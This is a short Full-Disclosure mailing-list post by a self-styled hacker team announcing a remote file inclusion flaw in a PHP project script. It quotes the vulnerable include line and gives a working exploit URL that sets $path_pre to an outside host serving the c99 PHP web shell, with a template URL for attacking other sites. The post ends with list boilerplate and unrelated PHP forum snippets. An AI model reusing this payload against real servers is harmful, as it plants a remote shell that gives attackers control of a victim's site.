[Full-disclosure] Vuln ....


# Found By Sp1deR_NeT ..

# E-mail :- Sp1deR_Net@xxxxxxxxxxx

# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com

# We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )


Script :- PHP rojekt5.1.1


Code Vuln :-

$include_path = $path_pre.'lib/lib.inc.php';

In File :- editor_big.php


Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?

Example :- www.sitename.com/[path]/lib/specialdays.php?




Sp1deR_NeT (((((((()))))))) ^__^


Be the first to hear what's new at MSN - sign up to our free newsletters!

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

    ... php classified script ... guestbook ardguest free php guestbook script ... php file upload script ...
  • Re: [PHP] PHP console script vs C/C++/C#
    ... My script is taking a longer time to execute than I want. ... I prefer to write in PHP because that is what I know best. ... This is why I am thinking about rewriting my whole script in a C language. ... Perhaps there are different methods I could be using to speed up execution. ...
  • Re: How to Add a Feeback Form
    ... I saw nothing in that script that indicates where the form is e-mailed to so ... Greg Maxey/Word MVP ... PHP or not. ... have the support available yet. ...
  • How best to show PHP source? (was: One page, multiple submit buttons)
    ... script to add to the top of a PHP script to enable showing its ... Maybe anybody submitting their own PHP code for critique here ... Anything posted to a newsgroup is a "snapshot" of what the ... there ought to be a FAQ for this ...
  • Email form script
    ... I have a web form that posts to a .php ... who cannot run .php on their server. ... Or does anyone have a .asp script that will ... Thank you for choosing FormToEmail by FormToEmail.com ...